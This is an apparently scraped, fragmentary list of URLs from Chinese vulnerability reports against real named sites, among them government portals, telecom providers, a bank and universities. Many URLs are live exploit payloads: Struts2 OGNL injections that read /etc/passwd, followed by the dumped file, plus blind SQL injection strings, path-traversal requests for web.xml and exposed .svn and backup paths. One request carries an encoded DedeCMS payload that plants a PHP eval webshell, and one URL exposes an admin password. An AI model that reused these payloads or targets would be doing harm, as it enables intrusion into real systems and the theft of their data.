http://124.133.53.182:8080/fckeditor/editor/plugins/bbcode/_sample/sample.html 
http://219.141.189.228:8081/efarm/sys/main.action;jsessionid=7AAD829DAAD21D920FB6A9A278697934.s2 http://www.gotomycloud.cn/login.action http://210.73.90.17/test/webgame/index.action http://career.oppo.com/?q=about/happydetail&id=40 http://theme.oppo.com/index.php?q=admin/main/index/index http://wo.10010sh.cn/emp/woLoginAction_login.action http://wo.10010sh.cn/emp/woLoginAction_login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.2office.cn/login.action http://10010.ruyi.com/sdltq3/front/FrontPortalAction!index.action http://10010.ruyi.com/sdltq3/front/FrontPortalAction!index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.duzhe.com/login.action http://Mr.***/,其实是我微信名字:Mr.***,而不知道为何,微信会把用户名字识别成 www.lcx.cc http://Mr.***/”的时候(该域名不存在),会被“劫持”到网络运营商的广告页面(例如电信的114导航之类的),然后,然后就没有了…… http://www.szhr.com.cn/web3new/seekjob/login!login.action http://www.caohejinghr.com/login.action http://wsbs.zjjxw.gov.cn/information/index.action http://policy.mofcom.gov.cn/export/EU-REACH/xiangmuwenjian4/index.action http://119.254.72.25:8088/ 
http://sswz.spb.gov.cn/index/index.action?officeId=51080100 http://online.kefu.xiaomi.com/web/icc/chat/chat?c=1&s=1 http://old.wofs.com.cn http://202.101.25.184/UPOPMSPortal/login/index.action http://www.sntele.com/index.action http://www.hwcc.gov.cn http://www.hwcc.gov.cn:7093/hwzwgk/mail/action/mail!select.action?box_id=2 http://www.haxc.lss.gov.cn/home.action http://www.bs.ecnu.edu.cn/admin/default.asp http://125.64.60.6/i!index.action http://218.1.102.107:9001/tba/xzxk_search.jsp?pro_id=XXX http://www.tba.gov.cn/tba/content/TBA/xzxk/index.html http://kczx.zju.edu.cn/yjskczx/Index.action?cid=189 http://baoguo.fupin.org.cn http://adc.hn165.com/login.action;jsessionid=6F35C6FA86A675ECDCAB8CAE8437A543 http://www.fantong.com/?s=biz&a=biz_order_success&oid=7330824&bid=393266&f=&df=&void= http://www.fantong.com/?s=biz&a=biz_order_success&bid=393266&oid=7330824 http://www.186btob.com/login.action http://www.183.sc.cn http://hyy.ah163.net/meeting/portal/base/login.action http://www.xmjj.gov.cn/xxfw/login_user.action http://www.lfnews.cn/lfnews905/login.php http://www.lfnews.cn/anli/admin/ http://www.lfweishengju.cn/lfnews905/login.php http://www.lfnews.cn/sheying/index.php?m=admin&c=index&a=login&pc_hash= http://fang.lfnews.cn/xiaoqu_show.php?xiaoqu_id=16 http://www.lfnews.cn/zhuanti/admin/news_manage.php http://cc.bj189.cn/base/permission/login/login.action http://www.yypt.net.cn http://www.yypt.net.cn/finhome/home/index.action www.chinarewards.cn/om/index.action http://sx.kdsw.cn/cms2/login.jsp http://www.4001007777.com/jtec/portal/home/portal-home!infoShow.action 
http://www.4001007777.com/jtec/portal/home/portal-home!infoShow.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://cms.info.cncma.org/info/ http://cms.info.cncma.org/manager/status http://my.maxthon.cn/convention.html http://my.maxthon.cn/help.html http://my.maxthon.cn/login.html http://my.maxthon.cn/recover.html http://my.maxthon.cn/register.html http://my.maxthon.cn/registerMobile.html http://my.maxthon.cn//language/.svn/entries svn://10.0.0.10/web/my.mx/testing/language svn://10.0.0.10/web http://my.maxthon.cn//public/bootstrap/css/.svn/entries svn://10.0.0.10/web/my.mx/testing/public/bootstrap/css svn://10.0.0.10/web http://db.sme.gov.cn/login.action http://gxsvr.online.cq.cn/speedUp.action http://mail.online.cq.cn/aiwmWeb/admin/login.action http://gxsvr.online.cq.cn/charge.action http://stats.chinapost.gov.cn/user_login.action http://sswz.chinapost.gov.cn/login/login!link.action http://sswz.chinapost.gov.cn/index/index.action http://sswz.chinapost.gov.cn/reg/reg!edit.action http://sswz.chinapost.gov.cn/index/froinfo!reguList.action http://www.bjpost.gov.cn/ 
http://www.bjpost.gov.cn/PostOfficeAction!querybyxzq.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ident:x:98:98::/home/ident:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin 
canna:x:39:39:Canna User:/var/lib/canna:/sbin/nologin htt:x:100:101:IIIMF Htt:/usr/lib64/im:/sbin/nologin radiusd:x:95:95:radiusd user:/:/bin/false ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false named:x:25:25:Named:/var/named:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash hacluster:x:511:90::/home/hacluster:/bin/bash dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash radvd:x:75:75:radvd user:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin weblogic:x:512:512::/home/weblogic:/bin/bash bjpost:x:500:0::/home/bjpost:/bin/bash lifvc:x:513:513::/home/lifvc:/bin/bash zhainan:x:0:0::/home/zhainan:/bin/bash IP:10.0.183.1这个用猜有点难,如果不在这里设置,直接访问http://fjtct.now.cn:7751/10.0.183.1/是会跳转到内网http://10.0.183.1地址的,肯定访问不了。 http://hwap.xjwxcs.com/index.action http://hui.xjwxcs.com/coupon/couponDetail.action http://hui.xjwxcs.com/guige.jsp http://hwap.xjwxcs.com/guige.jsp http://sso.mamabb.com/register/commonRegisterNew.action http://cart.mamabb.com/shop/greenWay/goGreenWay.action http://www.ccard.net.cn/ccard/sortproduct/sortCard!soryCategory.action http://114.80.121.75/index.do http://www.ah.95598.cn/index.action?orgCd=3&&dsfwl=1 http://cdm.frkwj.com/LoginPage.aspx http://125.68.187.14/LoginPage.aspx http://222.177.25.186/LoginPage.aspx http://222.141.119.20/LoginPage.aspx http://114.135.72.197/ http://www.wccg.gov.cn/webback/Login.action http://aqbzh.chinasafety.gov.cn/sps/loginaction!login.action http://wap.114so.cn/search.action http://vipclub.letv.com/dispatcher.action?code=APPLYT1 http://vipclub.letv.com/dispatcher.action?code=APPLYT1 http://vipclub.letv.com/dispatcher.action?code=APPLYT1/../../web.xml 
http://wsfw.bjepb.gov.cn:8080/motor/login.action http://love.17173.com/admin_manage/ http://icp.now.cn/存在列目录漏洞导致数据库备份信息泄露 http://icp.now.cn/WEB-INF/ http://icp.now.cn/data/ http://icp.now.cn/backup/ www.hca.gov.cn,存在严重的struts2 http://www.scsf.gov.cn/tzxx/index.action http://115.182.94.145 http://115.182.94.145/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml http://115.182.94.145/resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp www.cnhww.com http://localhost/viewreturn.asp http://localhost/viewreturn.asp http://wo.wasu.cn/viewBroadCastList.action http://www.962518.com/onlinetrain/foreground/beginStudyAction.action http://zshopbao.make-hb-171103.300.cn/manager/pages/login/login.jsp http://www.xd.com/security/forget_pass http://cpi.11185.cn/index.action http://cpi.11185.cn/guige.jsp http://www.58dongman.com/index.action http://fc.chachaba.com http://jzxy.ncut.edu.cn/old/chs/note.php?Jzxy_GongGao_ID=21 http://xxxxx/index!OAIndex.action http://xxxxx/index!OAIndex.action?redirect:$ http://www.jmi.tsinghua.edu.cn/jmi/do.php?index=Tsinghua&do=content&lang=zh&titleid=200 http://itv2.youku.com/onlyf.php?vid=XMzMyNDA3NzMy http://itv2.youku.com/onlyf.php?vid=XMzMyNDA3NzMy http://itv2.youku.com/onlyf.php?vid=XMzMyNDA3NzMy'%20or%20'1'='1 http://itv2.youku.com/onlyf.php?vid=XMzMyNDA3NzMy'%20and%20'1'='2 http://fencheng.tudou.com/login.action http://www.nestlebaby.com.cn/expert/question.action http://www.nestlebaby.com.cn/guige.jsp http://wdcx.yundasys.com:81/jjjk/jjjk.php http://wdcx.yundasys.com:81/car_query/ http://wdcx.yundasys.com:11347/p3_system_web/manage/power/sysuser_login.action http://role.wanmei.com/WEB-INF/web.xml http://role.wanmei.com/WEB-INF/conf/activemq.xml jdbc:mysql://192.168.127.26:3306/wmeovg?useUnicode=true&characterEncoding=UTF8"/ http://car.yundasys.com:81/df2009/php/mainFrame.php http://car.yundasys.com:81/df2009/php/wdmdtzbb_new.php http://bi.yundasys.com:10152/settlement/upload/upload_uploadExcel.action 
http://www.youngpeak.com.cn/ http://policy.mofcom.gov.cn/export/honey/c4-2-1.action http://www.lashou.com/account/reset?code= http://app.mps.gov.cn:8686/clueAction_clueStatement.action http://www.channelsoft.com/casedetail.jsp?type=0&contentid=83 http://www.lashou.com/account/reset?code= http://www.lashou.com/account/reset?code=MTg2MDA5M*******我是马赛克*******NTc5MkB*********jQxOXwzNDQwMDI3NTZkOTY4**********hMA%3D%3D http://minisite2.youku.com/activities_fee/www/design_tools/index.php http://minisite2.youku.com/activities_fee/www/design_tools/index.php?m=Design&a=designNew&id=996&view=yes http://minisite2.youku.com/activities_fee/www/design_tools/index.php?m=Design&a=designNew&view=yes&id=996 http://minisite2.youku.com/activities_fee/www/design_tools/index.php?m=Design&a=designNew&view=yes&id=996 http://www.gpai.net/index_index.action http://122.227.170.139/mLoginAction.do http://122.227.170.139//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://117.21.241.238/frameset/login.action http://117.21.241.238/frameset/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://117.21.241.238/udb/toLoginAction.do http://117.21.241.238/myname/index1.jsp http://wap.doov.com.cn/page/indexList.do http://yypt.cib.com.cn/finhome/fin_product/index.action lp:/bin/false invscout:/usr/bin/ksh user:/usr/sbin/snapp:/usr/sbin/snappd ipsec:/usr/bin/ksh user:/var/spool/uucppublic:/usr/sbin/uucp/uucico pconsole:/usr/bin/ksh esa:/usr/bin/ksh empty:/usr/bin/ksh xtjk:/usr/bin/ksh weblogic:/usr/bin/ksh 
apache2063:/usr/bin/ksh cxwh:/usr/bin/ksh http://buy.hiapk.com/ http://events.youku.com/zuqiubaobei/index.php?realname=李燕 http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,1,1%29%29=115,1,0%29%29=1%20and%20%271%27=%271 http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,2,1%29%29=108,1,0%29%29=1%20and%20%271%27=%271 http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,3,1%29%29=97,1,0%29%29=1%20and%20%271%27=%271 http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,4,1%29%29=118,1,0%29%29=1%20and%20%271%27=%271 http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,5,1%29%29=101,1,0%29%29=1%20and%20%271%27=%271 http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,6,1%29%29=95,1,0%29%29=1%20and%20%271%27=%271 http://pc.buy.91.com http://job.njcb.com.cn:8080/sadvertise.action http://open.12114.org.cn/user/doPreCase.do http://210.51.167.163:8080/auth/step1.action http://210.51.167.163:8080/auth/step1.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.kdsw.cn/Bulletin/BulletinSearch.aspx?key=%27 http://125.69.112.239/login.jsp http://125.69.112.239/invoker/JMXInvokerServlet 
http://www.hsc.fr/ressources/outils/jisandwis/download下载 http://www.piccnet.com.cn/ http://scm.piccnet.com.cn/piccweb/netBiddingNoticeAction.action http://scm.piccnet.com.cn/piccweb/getPurchaseNoticeAction.action http://scm.piccnet.com.cn/piccweb/productMlTitle.action等等等等 http://scm.piccnet.com.cn/piccweb/M4.txt http://www.gsjs.gov.cn/yqsb/uploadfile.asp http://xgb.pku.edu.cn/home/viewPage.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://p.shvns.com/vnslogin/login.do http://wlkt.yn.gov.cn/onlinelearn/init.action http://mojie.xunlei.com/.bash_history http://se.sjtu.edu.cn/index.action http://sec.huawei.com/sec/web/mapp.do http://go.hn.189.cn/tbIndexAdvertisement!gotoIndex.action http://123.103.23.10/lxjweb/service/activeUser.do http://222.221.6.231/ders_resource/manager/login.jsp http.oa.broad-asia.net/thank.asp http://llt.fantong.com/login.action http://yunda.yonyou.com http://yunda.yonyou.com/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ http://www.pbx010.com/login_view.action http://www.51ey.com/loginAction!login.action http://research.gtja.net:8081/logon.action http://gpsone.gxbnet.cn/login.do http://hc15.aipai.com/user/347/18715347/4027355/card/14877943/14877943_big.jpg http://hc15.aipai.com/user/347/18715347/4027355/card/14877943/card.mp4?l=l http://www.189see.com/inclued/indexEmbedAction!findAllMallNotice.do http://im.wo.com.cn/webportal//loginSp/userLogin.action这里可以执行 
http://im.wo.com.cn/webportal//loginSp/userLogin.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://lol.52pk.com/cache/20130720/111.html http://www.baidu00.com/pppa.js www.ncinfo.gov.cn http://www.ncinfo.gov.cn/Newsite/list.asp?btype=%D5%FE%B2%DF%B7%A8%B9%E6 http://www.ncinfo.gov.cn/Newsite/content_detail.asp?id=16856 http://www.ncinfo.gov.cn/Newsite/sub1.asp?id=224 http://scebm.bda.edu.cn/Qtbm!toList.action http://www.csndmc.ac.cn/newweb/secondpage.jsp?id=1208 http://bbs.5see.com http://bbs.5see.com/comiis_x19lou/comiis_logo.gif/.php http://bbs.5see.com/data/attachment/forum/201307/22/125630jaaj4bb6ifhjdbb1.jpg/ http://localhost/sdcms/user/email.asp?act=checkdb http://www.west263.com/services/webhosting/buy.asp http://www20.west263.com/services/webhosting/buy.asp http://cdn.west263.com/services/webhosting/buybj.asp http://www.west263.com/manager/domain/nsmodi.asp http://beian.bizcn.com/login_login.action http://beian.71.com/login_login.action http://www.100icp.com:18080/beian/login_login.action http://ispapi.dns-china.com:18080/beian/login_login.action http://222.80.184.140:8080/beian/login_login.action http://beian1.8849x.cn/beian/login_login.action http://jinan.icp.chinanetcenter.com/login_login.action http://beian.guilinlife.com:8080/beian/login_login.action http://www.xmcnc.net:8989/beian/login_login.action http://218.83.161.121/beian/login_login.action http://beian.loongo.com/login_login.action http://ba.21nic.cn:18080/login_login.action http://www.unnets.com:18080/beian/login_login.action http://218.246.195.60/beian/login_login.action 
http://125.39.152.21/login_login.action http://61.152.93.115:5151/beian/login_login.action http://beian.icelit.com/login_login.action http://beian.cnc.71.com/login_login.action http://www.auchan.com.cn:8089/AuchanWeb/Card!ClientProcess.action http://www.bmrzzx.com.cn/basedemo/index.action http://sales.sc.chinaunicom.com/echannel/Login!input.action http://www.t3pay.cn/contentAction!getSingleContentBySyGg.action http://www.t3pay.cn/login.jsp https://www.edrbank.com/pbank/common/account/netbanksign.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://jeepont.com/shortshow.asp?id=2751and1 http://beijing.koofang.com/weituo/ http://trop.agridata.cn/ch_NewsFrm/newsOne.asp?id=401 site:youku.com inurl:callback http://m.nuomi.com/user/address/save?areaId=1000010000 http://xss.tw/2644 http://www.spqi.gov.cn/trav/StoryFile.aspx?RecordID=2201 http://www.spqi.gov.cn/trav/StoryFile.aspx?RecordID=2201 http://wap.citygf.com/wap/index.do http://wap.citygf.com/wap/guige.jsp http://wap.citygf.com/wap/404.jsp http://sxdkj.gov.cn:2012/ 
http://sxdkj.gov.cn:2012/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://sxdkj.gov.cn:2012/plus/mytag_js.php?aid=9013 http://www.xxx.org/plus/90sec.php http://ky.ahedu.gov.cn/show.asp?id=353 
http://www.cssti.cn/zxzxinfo.asp?id=438 http://218.77.*.*:8001/LoginExtMenuAction.action http://ytw.yzzb.com.cn/item/listphoto.asp?id=70 http://www.wjcti.com/sg_read.asp?id=3199 http://zwgk.heihe.gov.cn/zf_neirong.asp?ID=158234392409 http://220.181.61.111/index http://www.tgw.cn:18080/Index.action http://lib.nuc.edu.cn/new/index.action http://zz.edu.cn/project/pxxm_lb.php?act=showTypeList&typeid=3 http://www.pd-sts.com/sts/stsIndex/testList.action http://www.deppon.com.cn/transonline/orderBrowse.action http://www.tbook.com.cn/IndexAction.action http://www.casm.ac.cn/news.php?col=93&file=3821 http://www.moko.cc/subscribeUpdate|faceAddSubscribe.action http://mall.wxcd.net.cn/activity/lovehome/portal/index!index.action http://www.ecdc.net.cn/conference/sstf/en/mediareg.asp http://pay.5see.com/getgameServers.aspx?game= http://pay.5see.com/getgameServers.aspx?game=aaa http://pay.5see.com/getgameServers.aspx?game=aaa http://pay.5see.com/getgameServers.aspx?game=aaa'%20and%20'1'='1 http://pay.5see.com/getgameServers.aspx?game=aaa http://218.206.165.70:8080/customdev-qhwxcs/xn/hospital/chaxun.action http://www.b2b-builder.com/announcement.php?id=30 http://www.jsyzpx.com/2012ds/ http://221.224.25.28:8008/framework/news/NewsEdit.aspx http://aigu.stcn.com/try.action http://aigu.stcn.com/guige.jsp http://www.icinfo.cn/ http://www.icinfo.cn/manageuser/manageLogin.action?username=admin&password=huixinadmin http://221.180.20.100/index/index.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.nari-china.com/htgl/ http://www.nari-china.com/htgl/top.aspx 
http://www.nari-china.com/htgl/left.aspx http://www.nari-china.com/htgl/Default.aspx http://www.nari-china.com/htgl/left.aspx http://211.150.64.86/PCC/loginMail.do http://211.150.64.87/PCC/loginMail.do http://211.150.64.88/PCC/loginMail.do http://search.dichan.com/search.dichan.com.rar http://zzxxw.dahe.cn/index.do http://zzxxw.dahe.cn/guige.jsp http://www.ccjgdj.gov.cn/index.action http://dmp.kingdee.com/bak/sql.rar http://cm.cb.com.cn/cube/blog/goCenter.action http://cm.cb.com.cn/cube/guige.jsp http://ieread.cb.com.cn/register.do http://ieread.cb.com.cn/guige.jsp http://222.247.54.156/ http://117.79.80.12/gfan-recharge!rechargeGameDis.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.szjsj.gov.cn/ZhuJian/NewAction_safe.action http://sswz.spb.gov.cn/ http://sswz.spb.gov.cn/login/login!link.action http://hve.sgepri.sgcc.com.cn/vhe/ch/reader/key_query.aspx Url:http://pay.7wgame.com/getgameServers.aspx?game=1 http://www.ynrcfw.cn/ynrcfw/index_rsdl.action http://jss.usst.edu.cn/ch/reader/key_query.aspx http://gswxb.cnjournals.cn/ch/reader/key_query.aspx http://www.dzykt.com/dzyktcn/ch/reader/key_query.aspx http://www.kcdz.ac.cn/ch/reader/key_query.aspx http://tnuaa.nuaa.edu.cn/ch/reader/key_query.aspx http://www.jos.org.cn/ch/reader/key_query.aspx http://www.jors.cn/jrs/ch/reader/key_query.aspx http://www.cjcmm.com.cn/cjcmmte/ch/reader/key_query.aspx http://magazine.laser-infrared.com/ch/reader/key_query.aspx http://www.zgykdxxb.cn/jcpu/ch/reader/key_query.aspx?volume=31&issue=1&start_page=25 http://www.gdforestscience.com/ch/reader/key_query.aspx 
